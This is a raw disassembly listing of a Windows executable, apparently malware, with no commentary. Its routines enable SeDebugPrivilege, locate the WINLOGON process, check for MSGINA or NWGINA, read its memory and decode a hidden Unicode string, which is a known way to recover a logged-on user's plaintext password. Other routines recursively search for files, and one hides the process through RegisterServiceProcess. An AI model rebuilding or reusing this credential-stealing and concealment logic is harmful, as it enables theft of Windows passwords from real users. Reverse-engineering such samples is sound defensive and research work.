call sub_4173AC
add esp, 20h
jmp short loc_408CB9
; ---------------------------------------------------------------------------
loc_408CA2: ; CODE XREF: sub_408B8D+E4�j
lea eax, [ebp+var_70]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_4173AC
add esp, 10h
loc_408CB9: ; CODE XREF: sub_408B8D+113�j
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_2F0]
push eax
call sub_40C4F7
add esp, 18h
loc_408CDE: ; CODE XREF: sub_408B8D+B9�j
push [ebp+var_8]
call sub_4180DC
pop ecx
jmp short loc_408D25
; ---------------------------------------------------------------------------
loc_408CE9: ; CODE XREF: sub_408B8D+6A�j
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_2F0]
push eax
call sub_40C4F7
add esp, 28h
loc_408D25: ; CODE XREF: sub_408B8D+60�j
; sub_408B8D+A2�j ...
push [ebp+var_4]
call dword_441394 ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], ebx
lea eax, [esi-0Ch]
jnz loc_408BBD
pop edi
pop esi
loc_408D3F: ; CODE XREF: sub_408B8D+19�j
pop ebx
leave
retn
sub_408B8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D42 proc near ; DATA XREF: sub_40F6F1+3E58�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_417AF0
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_408D97
lea eax, [ebp+var_114]
push eax
call sub_417AF0
pop ecx
mov [ebp+eax+var_115], bl
loc_408D97: ; CODE XREF: sub_408D42+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_42AA6C
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41792A
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_408DDC
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40DC10
add esp, 14h
loc_408DDC: ; CODE XREF: sub_408D42+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_408E5A
push eax
lea eax, [ebp+var_49C]
push offset unk_42AA3C
push eax
call sub_4173AC
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_408E3A
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40DC10
add esp, 14h
loc_408E3A: ; CODE XREF: sub_408D42+D6�j
lea eax, [ebp+var_49C]
push eax
call sub_40C4F7
push [ebp+var_10]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
pop edi
pop esi
pop ebx
sub_408D42 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E5A proc near ; CODE XREF: sub_408D42+B9�p
; sub_408E5A+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset aS_3 ; "%s\\*"
push esi
push eax
call sub_41792A
mov edi, dword_4210B8
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_3 ; "%s\\%s"
jz short loc_408F17
loc_408EA6: ; CODE XREF: sub_408E5A+BB�j
test [ebp+var_144], 10h
jz short loc_408F03
cmp [ebp+var_118], 2Eh
jnz short loc_408ECA
cmp [ebp+var_117], 0
jz short loc_408F03
cmp [ebp+var_117], 2Eh
jz short loc_408F03
loc_408ECA: ; CODE XREF: sub_408E5A+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41792A
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_408E5A
add esp, 2Ch
mov [ebp+arg_14], eax
loc_408F03: ; CODE XREF: sub_408E5A+53�j
; sub_408E5A+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
nop
call near ptr 7C834EB1h
test eax, eax
jnz short loc_408EA6
loc_408F17: ; CODE XREF: sub_408E5A+4A�j
push [ebp+var_4]
nop
call near ptr 7C80EDD7h
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41792A
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_408F9D
loc_408F4E: ; CODE XREF: sub_408E5A+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_41792A
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
nop
call near ptr 7C834EB1h
test eax, eax
jnz short loc_408F4E
loc_408F9D: ; CODE XREF: sub_408E5A+F2�j
push esi
nop
call near ptr 7C80EDD7h
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_408E5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408FAC proc near ; DATA XREF: sub_40F6F1+54A1�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_40BC5F
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_408FEB
cmp eax, 2
jz short loc_408FEB
push offset unk_42ACE0
jmp loc_40912A
; ---------------------------------------------------------------------------
loc_408FEB: ; CODE XREF: sub_408FAC+2E�j
; sub_408FAC+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_415B28
pop ecx
test eax, eax
pop ecx
jz loc_409125
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
nop
call near ptr 7C801D77h
mov esi, dword_4210D8
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_441064, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_441058, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_441268, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_441060, eax
call esi ; GetProcAddress
mov dword_44105C, eax
call sub_40917E
test eax, eax
mov [ebp+arg_0], eax
jz loc_4090F8
mov esi, dword_4210D4
mov edi, 400h
mov ebx, offset dword_440058
push edi
push ebx
push offset off_42AC1C
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_440858
push edi
push offset off_42AC04
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_441270
push [ebp+arg_0]
jnz short loc_4090A4
call sub_409307
jmp short loc_4090A9
; ---------------------------------------------------------------------------
loc_4090A4: ; CODE XREF: sub_408FAC+EF�j
call sub_4094AE
loc_4090A9: ; CODE XREF: sub_408FAC+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_4090F1
cmp dword_441270, 0
jnz short loc_4090D8
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_42AB8C
push 200h
push eax
call sub_41792A
add esp, 18h
jmp short loc_40910B
; ---------------------------------------------------------------------------
loc_4090D8: ; CODE XREF: sub_408FAC+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_4090E8
call sub_4095E4
jmp short loc_4090ED
; ---------------------------------------------------------------------------
loc_4090E8: ; CODE XREF: sub_408FAC+133�j
call sub_40967B
loc_4090ED: ; CODE XREF: sub_408FAC+13A�j
pop ecx
push eax
jmp short loc_4090FD
; ---------------------------------------------------------------------------
loc_4090F1: ; CODE XREF: sub_408FAC+101�j
push offset unk_42AB44
jmp short loc_4090FD
; ---------------------------------------------------------------------------
loc_4090F8: ; CODE XREF: sub_408FAC+B6�j
push offset unk_42AB00
loc_4090FD: ; CODE XREF: sub_408FAC+143�j
; sub_408FAC+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_40910B: ; CODE XREF: sub_408FAC+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_415B28
pop ecx
pop ecx
push [ebp+var_8]
nop
call near ptr 7C80ABDEh
pop ebx
jmp short loc_409138
; ---------------------------------------------------------------------------
loc_409125: ; CODE XREF: sub_408FAC+4E�j
push offset unk_42AABC
loc_40912A: ; CODE XREF: sub_408FAC+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_409138: ; CODE XREF: sub_408FAC+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_40915F
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40DC10
add esp, 14h
loc_40915F: ; CODE XREF: sub_408FAC+191�j
lea eax, [ebp+var_29C]
push eax
call sub_40C4F7
push [ebp+var_18]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_408FAC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40917E proc near ; CODE XREF: sub_408FAC+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, dword_4210E8
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, dword_4210E4
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_441064 ; ZwQuerySystemInformation
push ebp
push 0
call esi ; GetProcessHeap
push eax
nop
call near ptr 7C91043Dh
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword_441064 ; ZwQuerySystemInformation
test eax, eax
jnz short loc_40926B
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_40926B
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_40926B
loc_409207: ; CODE XREF: sub_40917E+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_40925E
push 0
push 0
call dword_441058 ; RtlCreateQueryDebugBuffer
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_441268 ; RtlQueryProcessDebugInformation
test eax, eax
jnz short loc_40924F
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_418743
pop ecx
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_409283
loc_40924F: ; CODE XREF: sub_40917E+AA�j
test edi, edi
jz short loc_40925A
push edi
call dword_441060 ; RtlDestroyQueryDebugBuffer
loc_40925A: ; CODE XREF: sub_40917E+D3�j
mov eax, [esp+28h+var_10]
loc_40925E: ; CODE XREF: sub_40917E+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_409207
loc_40926B: ; CODE XREF: sub_40917E+6D�j
; sub_40917E+7A�j ...
xor edi, edi
loc_40926D: ; CODE XREF: sub_40917E+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
nop
call near ptr 7C91043Dh
mov eax, edi
loc_40927B: ; CODE XREF: sub_40917E+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_409283: ; CODE XREF: sub_40917E+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_4092EC
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_409299: ; CODE XREF: sub_40917E+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_418743
pop ecx
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_409300
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_418743
pop ecx
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_4092DE
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_4092DE: ; CODE XREF: sub_40917E+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_409299
loc_4092EC: ; CODE XREF: sub_40917E+10F�j
test edi, edi
jz short loc_4092F7
push edi
call dword_441060 ; RtlDestroyQueryDebugBuffer
loc_4092F7: ; CODE XREF: sub_40917E+170�j
mov edi, [esp+28h+var_4]
jmp loc_40926D
; ---------------------------------------------------------------------------
loc_409300: ; CODE XREF: sub_40917E+13C�j
xor eax, eax
jmp loc_40927B
sub_40917E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409307 proc near ; CODE XREF: sub_408FAC+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
nop
call near ptr 7C8309E1h
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_409330
xor eax, eax
jmp loc_4094AB
; ---------------------------------------------------------------------------
loc_409330: ; CODE XREF: sub_409307+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
nop
call near ptr 7C812D56h
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, dword_4210E8
push 8
call esi ; GetProcessHeap
mov edi, dword_4210E4
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, dword_4210F0
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_409380
xor esi, esi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409380: ; CODE XREF: sub_409307+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
nop
call near ptr 7C80B9A0h
test eax, eax
jz loc_40948D
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_40948D
test [ebp+var_2B], 1
jnz loc_40948D
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_40948D
loc_4093E3: ; CODE XREF: sub_409307+112�j
push edi
push offset dword_440058
call sub_42047C
pop ecx
test eax, eax
pop ecx
jnz short loc_40940B
lea eax, [edi+200h]
push eax
push offset dword_440858
call sub_42047C
pop ecx
test eax, eax
pop ecx
jz short loc_40941B
loc_40940B: ; CODE XREF: sub_409307+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_40948D
jmp short loc_4093E3
; ---------------------------------------------------------------------------
loc_40941B: ; CODE XREF: sub_409307+102�j
test edi, edi
jz short loc_40948D
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
nop
call near ptr 7C80E866h
test eax, eax
jz short loc_409456
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
nop
call near ptr 7C80E7ECh
test eax, eax
jz short loc_409456
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_409456: ; CODE XREF: sub_409307+12B�j
; sub_409307+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov dword_44127C, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_441274, eax
mov dword_441278, edi
loc_40948D: ; CODE XREF: sub_409307+90�j
; sub_409307+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
nop
call near ptr 7C91043Dh
mov esi, [ebp+var_10]
loc_40949E: ; CODE XREF: sub_409307+74�j
push [ebp+var_4]
nop
call near ptr 7C809B47h
pop edi
mov eax, esi
pop ebx
loc_4094AB: ; CODE XREF: sub_409307+24�j
pop esi
leave
retn
sub_409307 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094AE proc near ; CODE XREF: sub_408FAC:loc_4090A4�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
nop
call near ptr 7C8309E1h
test eax, eax
mov [ebp+arg_0], eax
jz loc_4095A0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
nop
call near ptr 7C812D56h
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_409597
mov edi, dword_4210E8
loc_4094F9: ; CODE XREF: sub_4094AE+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
nop
call near ptr 7C80B9A0h
test eax, eax
jz short loc_409585
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_40958B
test [ebp+var_13], 1
jnz short loc_40958B
push ecx
push 8
call edi ; GetProcessHeap
push eax
nop
call near ptr 7C9105D4h
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
nop
call near ptr 7C8021CCh
test eax, eax
jz short loc_409577
push offset dword_440058
push esi
call sub_42047C
pop ecx
test eax, eax
pop ecx
jnz short loc_409577
lea eax, [esi+400h]
push offset dword_440858
push eax
call sub_42047C
pop ecx
test eax, eax
pop ecx
jz short loc_4095A7
loc_409577: ; CODE XREF: sub_4094AE+9F�j
; sub_4094AE+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
nop
call near ptr 7C91043Dh
jmp short loc_40958B
; ---------------------------------------------------------------------------
loc_409585: ; CODE XREF: sub_4094AE+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_40958B: ; CODE XREF: sub_4094AE+71�j
; sub_4094AE+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_4094F9
loc_409597: ; CODE XREF: sub_4094AE+3F�j
push [ebp+arg_0]
nop
call near ptr 7C809B47h
loc_4095A0: ; CODE XREF: sub_4094AE+1E�j
xor eax, eax
loc_4095A2: ; CODE XREF: sub_4094AE+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4095A7: ; CODE XREF: sub_4094AE+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_441274, ebx
mov dword_441278, eax
cmp [eax], cl
jnz short loc_4095C9
cmp [eax+1], cl
jz short loc_4095D1
loc_4095C9: ; CODE XREF: sub_4094AE+114�j
; sub_4094AE+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4095C9
loc_4095D1: ; CODE XREF: sub_4094AE+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
nop
call near ptr 7C809B47h
push 1
pop eax
jmp short loc_4095A2
sub_4094AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095E4 proc near ; CODE XREF: sub_408FAC+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_441270
push esi
mov esi, dword_4210E8
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
nop
call near ptr 7C9105D4h
mov ecx, dword_441270
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push dword_441278
push eax
call sub_417490
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr dword_44127C
push eax
call dword_44105C ; RtlRunDecodeUnicodeString
push [ebp+var_4]
mov edi, offset dword_441068
push offset dword_440058
push offset dword_440858
push [ebp+arg_0]
push offset unk_42AD40
push 200h
push edi
call sub_41792A
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
nop
call near ptr 7C91043Dh
mov eax, edi
pop edi
pop esi
leave
retn
sub_4095E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40967B proc near ; CODE XREF: sub_408FAC:loc_4090E8�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_441270
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
nop
call near ptr 7C80ABC1h
push eax
nop
call near ptr 7C9105D4h
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_440858
mov edi, 200h
mov esi, offset dword_43FE58
loc_4096C1: ; CODE XREF: sub_40967B+FA�j
mov eax, dword_441270
add eax, eax
push eax
push dword_441278
push [ebp+var_14]
call sub_417490
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_44105C ; RtlRunDecodeUnicodeString
mov eax, dword_441270
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_409736
loc_4096FE: ; CODE XREF: sub_40967B+B3�j
cmp [ebp+var_8], 0
jz short loc_409753
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_409722
cmp byte ptr [ecx+1], 0
jnz short loc_409722
cmp dl, 20h
jnb short loc_40971C
and [ebp+var_8], 0
loc_40971C: ; CODE XREF: sub_40967B+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_409726
loc_409722: ; CODE XREF: sub_40967B+90�j
; sub_40967B+96�j
and [ebp+var_8], 0
loc_409726: ; CODE XREF: sub_40967B+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_4096FE
cmp [ebp+var_8], 0
jz short loc_409753
loc_409736: ; CODE XREF: sub_40967B+81�j
push [ebp+var_14]
push offset dword_440058
push ebx
push [ebp+arg_0]
push offset unk_42AD40
push edi
push esi
call sub_41792A
add esp, 1Ch
jmp short loc_40976B
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_40967B+87�j
; sub_40967B+B9�j
push offset dword_440058
push ebx
push [ebp+arg_0]
push offset unk_42ADAC
push edi
push esi
call sub_41792A
add esp, 18h
loc_40976B: ; CODE XREF: sub_40967B+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_4096C1
push [ebp+var_14]
push 0
nop
call near ptr 7C80ABC1h
push eax
nop
call near ptr 7C91043Dh
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_40967B endp
; =============== S U B R O U T I N E =======================================
sub_409794 proc near ; CODE XREF: ___:0040EC83�p
push ebx
push ebp
mov ebp, dword_4210FC
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, dword_4210D8
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4098B4
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_441464, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4413D8, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4413BC, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4412D8, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_441284, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4412B4, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_441328, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_441418, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_441474, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4412E4, eax
call esi ; GetProcAddress
cmp dword_441464, ebx
mov dword_4412CC, eax
jz short loc_409892
cmp dword_4413D8, ebx
jz short loc_409892
cmp dword_4413BC, ebx
jz short loc_409892
cmp dword_4412D8, ebx
jz short loc_409892
cmp dword_4412B4, ebx
jz short loc_409892
cmp dword_441328, ebx
jz short loc_409892
cmp dword_441418, ebx
jz short loc_409892
cmp dword_441474, ebx
jz short loc_409892
cmp dword_4412E4, ebx
jz short loc_409892
cmp eax, ebx
jnz short loc_40989C
loc_409892: ; CODE XREF: sub_409794+B8�j
; sub_409794+C0�j ...
mov dword_441478, 1
loc_40989C: ; CODE XREF: sub_409794+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4413F0, eax
jz short loc_4098C9
push 1
push ebx
call eax
jmp short loc_4098C9
; ---------------------------------------------------------------------------
loc_4098B4: ; CODE XREF: sub_409794+1D�j
nop
call near ptr 7C910331h
mov dword_44147C, eax
mov dword_441478, 1
loc_4098C9: ; CODE XREF: sub_409794+117�j
; sub_409794+11E�j
push offset aUser32_dll ; "user32.dll"
nop
call near ptr 7C801D77h
mov edi, eax
cmp edi, ebx
jz loc_4099DE
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_441414, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4413C4, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_441358, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
